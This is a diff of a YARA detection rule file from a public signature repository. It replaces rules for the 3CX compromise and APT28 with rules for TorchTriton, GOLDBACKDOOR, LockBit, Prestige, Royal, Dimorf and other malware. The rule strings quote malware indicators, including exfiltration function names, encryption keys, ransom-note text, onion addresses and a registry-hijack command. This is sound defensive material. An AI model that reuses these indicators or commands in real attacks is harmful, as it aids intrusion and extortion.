+		$dimensions = {02 00 00 A0 ?? 00 ?? ?? 01 00 01 00 01}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 2 of them
+		uint32be( 0x0 ) == 0x4C000000 and $dimensions and 2 of ( $j_* )
 }
-rule SIGNATURE_BASE_Apt28_Win_Zebrocy_Golang_Loader_Modified : FILE
+rule SIGNATURE_BASE_SUSP_ELF_Invalid_Version : FILE
 {
 	meta:
-		description = "Detects unpacked modified APT28/Sofacy Zebrocy Golang."
-		author = "@VK_Intel"
-		id = "cce9ba6c-954c-5b13-a058-cdf7895d63fc"
-		date = "2018-12-25"
+		description = "Identify ELF file that has mangled header info."
+		author = "@shellcromancer"
+		id = "5bd97fdd-0912-5f9b-877c-91fff9b98dea"
+		date = "2023-01-01"
 		modified = "2023-12-05"
-		reference = "https://www.vkremez.com/2018/12/lets-learn-progression-of-apt28sofacy.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_zebrocy.yar#L1-L22"
+		reference = "https://tmpout.sh/1/1.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L70-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "799f4457eb2bdeeb7c9383e2b4e9572a41d9adbfe4a1a9c3b0fa1c9fc6077e40"
+		hash = "05379bbf3f46e05d385bbd853d33a13e7e5d7d50"
+		logic_hash = "33f096318647867bcd90d7ba77878f43d34477b2b2cbd7410c191e60573d6cd5"
+		score = 55
+		quality = 85
+		tags = "FILE"
+		version = "0.1"
+
+	condition:
+		( uint32( 0 ) == 0x464c457f and uint8( 0x6 ) > 1 )
+}
+rule SIGNATURE_BASE_MAL_ELF_Torchtriton : FILE
+{
+	meta:
+		description = "Detection for backdoor (TorchTriton) distributed with a nightly build of PyTorch"
+		author = "Silas Cutler"
+		id = "85e98ee7-30bf-554f-a0ac-9df263e6dfe4"
+		date = "2023-01-02"
+		modified = "2023-12-05"
+		reference = "https://www.bleepingcomputer.com/news/security/pytorch-discloses-malicious-dependency-chain-compromise-over-holidays/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L88-L117"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "2385b29489cd9e35f92c072780f903ae2e517ed422eae67246ae50a5cc738a0e"
+		logic_hash = "12de3c3785aaf3623097db58abfe8ee2cbd9a0e712bf752165952de9a5fdb07d"
 		score = 75
-		quality = 79
+		quality = 85
 		tags = "FILE"
+		version = "1.0"
+		DaysofYARA = "2/100"
 
 	strings:
-		$go = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 }
-		$init = { 6d 61 69 6e 2e 69 6e 69 74 }
-		$main = "main" ascii wide fullword
-		$scr_git = {67 69 74 68 75 62 2e 63 6f 6d 2f 6b 62 69 6e 61}
-		$s0 = "os/exec.(*Cmd).Run" fullword ascii
-		$s1 = "net/http.(*http2clientConnReadLoop).processHeaders" fullword ascii
-		$s2 = "os.MkdirAll" fullword ascii
-		$s3 = "os.Getenv" fullword ascii
-		$s4 = "os.Create" fullword ascii
-		$s5 = "io/ioutil.WriteFile" fullword ascii
+		$error = "failed to send packet"
+		$aes_key = "gIdk8tzrHLOM)mPY-R)QgG[;yRXYCZFU"
+		$aes_iv = "?BVsNqL]S.Ni"
+		$func01 = "splitIntoDomains("
+		$func02 = "packageForTransport"
+		$func03 = "gatherFiles"
+		$func04 = "void sendFile("
+		$domain = "&z-%`-(*"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $go and $init and all of ( $s* ) and #main > 10 and #scr_git > 5
+		uint32( 0 ) == 0x464c457f and ( ( all of ( $aes_* ) ) or ( all of ( $func* ) and $error ) or ( $domain and 2 of them ) )
 }
-
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_1 : FILE
+rule SIGNATURE_BASE_MAL_GOLDBACKDOOR_LNK
 {
 	meta:
-		description = "Detects malicious DLLs related to 3CX compromise"
-		author = "X__Junior, Florian Roth (Nextron Systems)"
-		id = "a6ea3299-fde5-5206-b5db-eb3a3f5944d9"
-		date = "2023-03-29"
-		modified = "2023-04-20"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L3-L30"
+		description = "No description has been set in the source file - Signature Base"
+		author = "Greg Lesnewich"
+		id = "9a80f875-4843-535c-9f2b-b04da55713b1"
+		date = "2023-01-02"
+		modified = "2023-12-05"
+		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L119-L142"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "68f4007791d365900c84e32e076aa3cac9f3a9ed46de297f1005306554ee13f5"
-		score = 85
+		hash = "120ca851663ef0ebef585d716c9e2ba67bd4870865160fec3b853156be1159c5"
+		logic_hash = "043d01758c722964e848e51cf2747c5879f03f0fd43af827e2035abf113daf9d"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
-		hash2 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
-		hash3 = "cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2"
+		tags = ""
+		version = "1.0"
+		DaysofYARA = "2/100"
 
 	strings:
-		$opa1 = { 4C 89 F1 4C 89 EA 41 B8 40 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 F0 FF 15 ?? ?? ?? ?? 4C 8D 4C 24 ?? 45 8B 01 4C 89 F1 4C 89 EA FF 15 }
-		$opa2 = { 48 C7 44 24 ?? 00 00 00 00 4C 8D 7C 24 ?? 48 89 F9 48 89 C2 41 89 E8 4D 89 F9 FF 15 ?? ?? ?? ?? 41 83 3F 00 0F 84 ?? ?? ?? ?? 0F B7 03 3D 4D 5A 00 00}
-		$opa3 = { 41 80 7C 00 ?? FE 75 ?? 41 80 7C 00 ?? ED 75 ?? 41 80 7C 00 ?? FA 75 ?? 41 80 3C 00 CE}
-		$opa4 = { 44 0F B6 CD 46 8A 8C 0C ?? ?? ?? ?? 45 30 0C 0E 48 FF C1}
-		$opb1 = { 41 B8 40 00 00 00 49 8B D5 49 8B CC FF 15 ?? ?? ?? ?? 85 C0 74 ?? 41 FF D4 44 8B 45 ?? 4C 8D 4D ?? 49 8B D5 49 8B CC FF 15 }
-		$opb2 = { 44 8B C3 48 89 44 24 ?? 48 8B 5C 24 ?? 4C 8D 4D ?? 48 8B CB 48 89 74 24 ?? 48 8B D0 4C 8B F8 FF 15 }
-		$opb3 = { 80 78 ?? FE 75 ?? 80 78 ?? ED 75 ?? 80 38 FA 75 ?? 80 78 ?? CE }
-		$opb4 = { 49 63 C1 44 0F B6 44 05 ?? 44 88 5C 05 ?? 44 88 02 0F B6 54 05 ?? 49 03 D0 0F B6 C2 0F B6 54 05 ?? 41 30 12}
+		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
+		$doc_icon_loc = "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.exe" ascii wide
+		$script_apionedrivecom_hex_enc_str = "6170692e6f6e6564726976652e636f6d" wide
+		$script_kernel32dll_hex_enc_str = "6b65726e656c33322e646c6c" wide
+		$script_GlobalAlloc_hex_enc_str = "476c6f62616c416c6c6f63" wide
+		$script_VirtualProtect_hex_enc_str = "5669727475616c50726f74656374" wide
+		$script_WriteByte_hex_enc_str = "577269746542797465" wide
+		$script_CreateThread_hex_enc_str = "437265617465546872656164" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5MB and pe.characteristics & pe.DLL and ( 2 of ( $opa* ) or 2 of ( $opb* ) )
+		uint32be( 0x0 ) == 0x4C000000 and 1 of ( $doc* ) and 2 of ( $script* )
 }
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_2 : FILE
+rule SIGNATURE_BASE_MAL_EXE_Lockbit_V2 : FILE
 {
 	meta:
-		description = "Detects malicious DLLs related to 3CX compromise (decrypted payload)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bf3597ff-d62b-5d21-9c9b-e46e685284cf"
-		date = "2023-03-29"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/dan__mayer/status/1641170769194672128?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L32-L54"
+		description = "Detection for LockBit version 2.x from 2011"
+		author = "Silas Cutler, modified by Florian Roth"
+		id = "a2c27110-e63b-5f93-88a0-98c12811e8b4"
+		date = "2023-01-01"
+		modified = "2023-01-06"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L144-L169"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dec8310c1f5b304a755737a0005bb33b1762f21ed380b2b98b0f5427948ab930"
+		hash = "00260c390ffab5734208a7199df0e4229a76261c3f5b7264c4515acb8eb9c2f8"
+		logic_hash = "9472727d75e34d8bf87c56b74a6dfc04052e621b5fe31732ea9a10c76a05e0c0"
 		score = 80
 		quality = 60
 		tags = "FILE"
-		hash1 = "aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973"
+		version = "1.0"
+		DaysofYARA = "1/100"
 
 	strings:
-		$s1 = "raw.githubusercontent.com/IconStorages/images/main/icon%d.ico" wide fullword
-		$s2 = "https://raw.githubusercontent.com/IconStorages" wide fullword
-		$s3 = "icon%d.ico" wide fullword
-		$s4 = "__tutmc" ascii fullword
-		$op1 = { 2d ee a1 00 00 c5 fa e6 f5 e9 40 fe ff ff 0f 1f 44 00 00 75 2e c5 fb 10 0d 46 a0 00 00 44 8b 05 7f a2 00 00 e8 0a 0e 00 00 }
-		$op4 = { 4c 8d 5c 24 71 0f 57 c0 48 89 44 24 60 89 44 24 68 41 b9 15 cd 5b 07 0f 11 44 24 70 b8 b1 68 de 3a 41 ba a4 7b 93 02 }
-		$op5 = { f7 f3 03 d5 69 ca e8 03 00 00 ff 15 c9 0a 02 00 48 8d 44 24 30 45 33 c0 4c 8d 4c 24 38 48 89 44 24 20 }
+		$s_ransom_note01 = "that is located in every encrypted folder." wide
+		$s_ransom_note02 = "Would you like to earn millions of dollars?" wide
+		$x_ransom_tox = "3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7" wide
+		$x_ransom_url = "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion" wide
+		$s_str1 = "Active:[ %d [                  Completed:[ %d" wide
+		$x_str2 = "\\LockBit_Ransomware.hta" wide ascii
+		$s_str2 = "Ransomware.hta" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 3 of them or 5 of them
+		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_3
+
+rule SIGNATURE_BASE_MAL_EXE_Prestigeransomware : FILE
 {
 	meta:
-		description = "Detects malicious DLLs related to 3CX compromise (decrypted payload)"
-		author = "Florian Roth , X__Junior (Nextron Systems)"
-		id = "d2d361b6-8485-57eb-b6eb-88785f42e93e"
-		date = "2023-03-29"
-		modified = "2023-12-05"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L56-L79"
+		description = "Detection for Prestige Ransomware"
+		author = "Silas Cutler, modfied by Florian Roth"
+		id = "5ac8033a-8b15-5abe-89d5-018a4fef9ab5"
+		date = "2023-01-04"
+		modified = "2023-01-06"
+		reference = "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L171-L195"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "adfe04904d796690631e5841ee1ee10c767f9f4c340e5b9df78918e981359d4d"
+		hash = "5fc44c7342b84f50f24758e39c8848b2f0991e8817ef5465844f5f2ff6085a57"
+		logic_hash = "2f51ca71d28c8d0df8de22011e16919672d5f9d3f3d94594c5d0cbf7f1585a1e"
 		score = 80
 		quality = 85
-		tags = ""
-		hash1 = "aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973"
+		tags = "FILE"
+		version = "1.0"
+		DaysofYARA = "4/100"
 
 	strings:
-		$opa1 = { 41 81 C0 ?? ?? ?? ?? 02 C8 49 C1 E9 ?? 41 88 4B ?? 4D 03 D1 8B C8 45 8B CA C1 E1 ?? 33 C1 41 69 D0 ?? ?? ?? ?? 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 81 C2 ?? ?? ?? ?? 33 C1 43 8D 0C 02 02 C8 49 C1 EA ?? 41 88 0B 8B C8 C1 E1 ?? 33 C1 44 69 C2 ?? ?? ?? ?? 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 41 81 C0 }
-		$opa2 = { 8B C8 41 69 D1 ?? ?? ?? ?? C1 E1 ?? 33 C1 45 8B CA 8B C8 C1 E9 ?? 33 C1 81 C2 ?? ?? ?? ?? 8B C8 C1 E1 ?? 33 C1 41 8B C8 4C 0F AF CF 44 69 C2 ?? ?? ?? ?? 4C 03 C9 45 8B D1 4C 0F AF D7}
-		$opb1 = { 45 33 C9 48 89 6C 24 ?? 48 8D 44 24 ?? 48 89 6C 24 ?? 8B D3 48 89 B4 24 ?? ?? ?? ?? 48 89 44 24 ?? 45 8D 41 ?? FF 15 }
-		$opb2 = { 44 8B 0F 45 8B C6 48 8B 4D ?? 49 8B D7 44 89 64 24 ?? 48 89 7C 24 ?? 44 89 4C 24 ?? 4C 8D 4D ?? 48 89 44 24 ?? 44 89 64 24 ?? 4C 89 64 24 ?? FF 15}
-		$opb3 = { 48 FF C2 66 44 39 2C 56 75 ?? 4C 8D 4C 24 ?? 45 33 C0 48 8B CE FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 44 0F B7 44 24 ?? 33 F6 48 8B 54 24 ?? 45 33 C9 48 8B 0B 48 89 74 24 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 74 24 ?? FF 15 }
-		$opb4 = { 33 C0 48 8D 6B ?? 4C 8D 4C 24 ?? 89 44 24 ?? BA ?? ?? ?? ?? 48 89 44 24 ?? 48 8B CD 89 44 24 ?? 44 8D 40 ?? 8B F8 FF 15}
+		$x_ransom_email = "Prestige.ranusomeware@Proton.me" wide
+		$x_reg_ransom_note = "C:\\Windows\\System32\\reg.exe add HKCR\\enc\\shell\\open\\command /ve /t REG_SZ /d \"C:\\Windows\\Notepad.exe C:\\Users\\Public\\README\" /f" wide
+		$ransom_message01 = "To decrypt all the data, you will need to purchase our decryption software." wide
+		$ransom_message02 = "Contact us {}. In the letter, type your ID = {:X}." wide
+		$ransom_message03 = "- Do not try to decrypt your data using third party software, it may cause permanent data loss." wide
+		$ransom_message04 = "- Do not modify or rename encrypted files. You will lose them." wide
 
 	condition:
-		( all of ( $opa* ) ) or ( 1 of ( $opa* ) and 1 of ( $opb* ) ) or ( 3 of ( $opb* ) )
+		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 2 of them or pe.imphash ( ) == "a32bbc5df4195de63ea06feb46cd6b55" )
 }
-rule SIGNATURE_BASE_SUSP_APT_MAL_NK_3CX_Malicious_Samples_Mar23_1
+rule SIGNATURE_BASE_MAL_EXE_Royalransomware : FILE
 {
 	meta:
-		description = "Detects marker found in malicious DLLs related to 3CX compromise"
-		author = "X__Junior, Florian Roth (Nextron Systems)"
-		id = "9fc6eb94-d02f-5bcd-9f55-b6c6a8301b4f"
-		date = "2023-03-29"
-		modified = "2023-04-20"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L81-L98"
+		description = "Detection for Royal Ransomware seen Dec 2022"
+		author = "Silas Cutler, modfied by Florian Roth"
+		id = "f83316f7-b8c4-5907-a38e-80535215e7ef"
+		date = "2023-01-03"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L197-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dcce1f5e769a2821d746a960cd333f8042fb71c8469aa41c29bbbd0dce79369c"
+		hash = "a8384c9e3689eb72fa737b570dbb53b2c3d103c62d46747a96e1e1becf14dfea"
+		logic_hash = "6f93bade7709945b478cbdc721d85ad9243d56ace19fba25835cec13a6210dfb"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
-		hash2 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
-		hash3 = "cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2"
+		tags = "FILE"
+		version = "1.0"
+		DaysofYARA = "3/100"
 
 	strings:
-		$opx1 = { 41 80 7C 00 FD FE 75 ?? 41 80 7C 00 FE ED 75 ?? 41 80 7C 00 FF FA 75 ?? 41 80 3C 00 CE }
-		$opx2 = { 80 78 ?? FE 75 ?? 80 78 ?? ED 75 ?? 80 38 FA 75 ?? 80 78 ?? CE }
+		$x_ext = ".royal_" wide
+		$x_fname = "royal_dll.dll"
+		$s_readme = "README.TXT" wide
+		$s_cli_flag01 = "-networkonly" wide
+		$s_cli_flag02 = "-localonly" wide
+		$x_ransom_msg01 = "If you are reading this, it means that your system were hit by Royal ransomware."
+		$x_ransom_msg02 = "Try Royal today and enter the new era of data security!"
+		$x_onion_site = "http://royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid.onion/"
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5A4D and ( 2 of ( $x* ) or 5 of them )
 }
-rule SIGNATURE_BASE_APT_SUSP_NK_3CX_RC4_Key_Mar23_1 : FILE
+rule SIGNATURE_BASE_MAL_PY_Dimorf
 {
 	meta:
-		description = "Detects RC4 key used in 3CX binaries known to be malicious"
-		author = "Florian Roth (Nextron Systems)"
-		id = "18ea2185-11a1-51ad-a51a-df9e6357bb58"
-		date = "2023-03-29"
+		description = "Detection for Dimorf ransomeware"
+		author = "Silas Cutler"
+		id = "78b53433-6926-58cd-8ec0-2195af803aab"
+		date = "2023-01-03"
 		modified = "2023-12-05"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L100-L117"
+		reference = "https://github.com/Ort0x36/Dimorf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L224-L242"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8324b537b149ad3816b12ae0f887f66a284a8e1ef4fe7cf51eb21d59c0f055b9"
-		score = 70
+		logic_hash = "7499b21f77d07364983b94134a60f7c99e71a5392386437d459a196bf71852fb"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
-		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
-		hash3 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
-		hash4 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$x1 = "3jB(2bsG#@c7"
+		$func01 = "def find_and_encrypt"
+		$func02 = "def check_os"
+		$comment01 = "checks if the user has permission on the file."
+		$misc01 = "log_dimorf.log"
+		$misc02 = ".dimorf"
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 or uint16( 0 ) == 0x5a4d ) and $x1
+		all of them
 }
-
-rule SIGNATURE_BASE_SUSP_3CX_App_Signed_Binary_Mar23_1 : FILE
+rule SIGNATURE_BASE_APT_Area1_SSF_Plugx
 {
 	meta:
-		description = "Detects 3CX application binaries signed with a certificate and created in a time frame in which other known malicious binaries have been created"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b6ce4c1d-1b7b-5e0c-af4c-05cb3ad0a4e0"
-		date = "2023-03-29"
+		description = "Detects send tool used in phishing campaign reported by Area 1 in December 2018"
+		author = "Area 1"
+		id = "a5b4e781-f0d1-55df-926c-2d321aa48139"
+		date = "2018-12-19"
 		modified = "2023-12-05"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L119-L139"
+		reference = "https://cdn.area1security.com/reports/Area-1-Security-PhishingDiplomacy.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_area1_phishing_diplomacy.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3834b5ebb5a0db27a452fda1c97c921b2c9c8702505738232b15a3ed4a47dc47"
-		score = 65
+		logic_hash = "a71f124f0c89c4b020f21d029d0d2997b2bea71526e83bcadffb67acc9cca8f7"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "fad482ded2e25ce9e1dd3d3ecc3227af714bdfbbde04347dbc1b21d6a3670405"
-		hash2 = "dde03348075512796241389dfea5560c20a3d2a2eac95c894e7bbed5e85a0acc"
+		tags = ""
 
 	strings:
-		$sa1 = "3CX Ltd1"
-		$sa2 = "3CX Desktop App" wide
-		$sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 }
+		$feature_call = { 8b 0? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+         6a 07 6a ff ff d0 8b f0 85 f6 74 14 }
+		$keylogger_reg = { 8b 4d 08 6a 0c 6a 01 8d 55 f4 52 c7 45 f4 01 00 06 00
+         c7 45 f8 00 01 00 00 89 4d fc ff d0 85 c0 75 1d }
+		$file_op = { 55 8b ec 83 ec 20 0f b7 56 18 8b 46 10 66 8b 4e 14 89 45 e4
+         8d 44 32 10 66 89 4d f0 0f b7 4e 1a 57 89 45 e8 33 ff 8d 45 e0 8d 54
+         31 10 50 89 7d e0 89 55 ec c7 45 fa ?? ?? ?? ?? 89 7d f2 89 7d f6 ff
+         15 1c 43 02 10 }
+		$ver_cmp = { 0f b6 8d b0 fe ff ff 0f b6 95 b4 fe ff ff 66 c1 e1 08 0f b7
+         c1 0b c2 3d 02 05 00 00 7f 2c }
+		$regedit = { c7 06 23 01 12 20 c7 46 04 01 90 00 00 89 5e 0c 89 5e 08 e8
+         51 fb ff ff 8b 4d 08 8b 50 38 68 30 75 00 00 56 51 ff d2 }
+		$get_device_caps = { 8b 1d ?? ?? ?? ?? 6a 08 50 ff d3 0f b7 56 12 8b c8 0f af ca
+         b8 1f 85 eb 51 f7 e9 c1 fa 05 8b c2 c1 e8 1f 03 c2 89 45 f8 8b 45 f0 6a 0a 50 ff d3
+         0f b7 56 14 8b c8 0f af ca b8 1f 85 eb 51 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.timestamp > 1669680000 and pe.timestamp < 1680108505 and all of ( $sa* ) and $sc1
+		3 of them
 }
-rule SIGNATURE_BASE_SUSP_3CX_MSI_Signed_Binary_Mar23_1 : FILE
+rule SIGNATURE_BASE_APT_Area1_SSF_Googlesend_Strings : FILE
 {
 	meta:
-		description = "Detects 3CX MSI installers signed with a known compromised certificate and signed in a time frame in which other known malicious binaries have been signed"
-		author = "Florian Roth (Nextron Systems)"
-		id = "15d6d8ca-6982-5095-9879-ce97269a71c6"
-		date = "2023-03-29"
+		description = "Detects send tool used in phishing campaign reported by Area 1 in December 2018"
+		author = "Area 1 (modified by Florian Roth)"
+		id = "66a2faa1-b133-528c-91a9-06a43d2c00a0"
+		date = "2018-12-19"
 		modified = "2023-12-05"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L141-L166"
+		reference = "https://cdn.area1security.com/reports/Area-1-Security-PhishingDiplomacy.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_area1_phishing_diplomacy.yar#L29-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b0fa9821a02803473ce8139b19d005968b03c9765cff5b9ae5428a259d88cc9f"
-		score = 60
+		logic_hash = "3a373ed63494b67883515c133bf5b0af3ab874397c7cb45c8399f12e35212be4"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
-		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
 
 	strings:
-		$a1 = { 84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46 }
-		$sc1 = { 1B 66 11 DF 9C 9A 4D 6E CC 8E D5 0C 9B 91 78 73 }
-		$s1 = "3CX Ltd1"
-		$s2 = "202303"
+		$conf = "RefreshToken.ini" wide
+		$client_id = "Enter your client ID here" wide
+		$client_secret = "Enter your client secret here" wide
+		$status = "We are going to send" wide
+		$s1 = { b8 00 01 00 00 f0 0f b0 23 74 94 f3 90 80 3d ?? ?? ?? ?? 00 75 ??
+         51 52 6a 00 e8 ?? ?? ?? ?? 5a 59 b8 00 01 00 00 f0 0f b0
+         23 0f ?? ?? ?? ?? ?? 51 52 6a 0a e8 ?? ?? ?? ?? 5a 59 eb c3 }
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and $a1 and $sc1 and ( $s1 in ( filesize -20000 .. filesize ) and $s2 in ( filesize -20000 .. filesize ) )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Macos_NK_3CX_Malicious_Samples_Mar23_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Csharp
 {
 	meta:
-		description = "Detects malicious macOS application related to 3CX compromise (decrypted payload)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ff39e577-7063-5025-bead-68394a86c87c"
-		date = "2023-03-30"
+		description = "Strings from CSharp version of Agent"
+		author = "Fox-IT SRT"
+		id = "e5212226-a82d-558d-abb4-43ad7848764e"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L168-L184"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c2733c2f7dcca82e5a0b2301777fb54853d04dfa893bcf88ecbec34d37e1a38a"
-		score = 80
+		logic_hash = "e77fcd2ac0c21db54563b15466962a775a5e8ef73cedb3af5cd00d5b0d615e4c"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "b86c695822013483fa4e2dfdf712c5ee777d7b99cbad8c2fa2274b133481eadb"
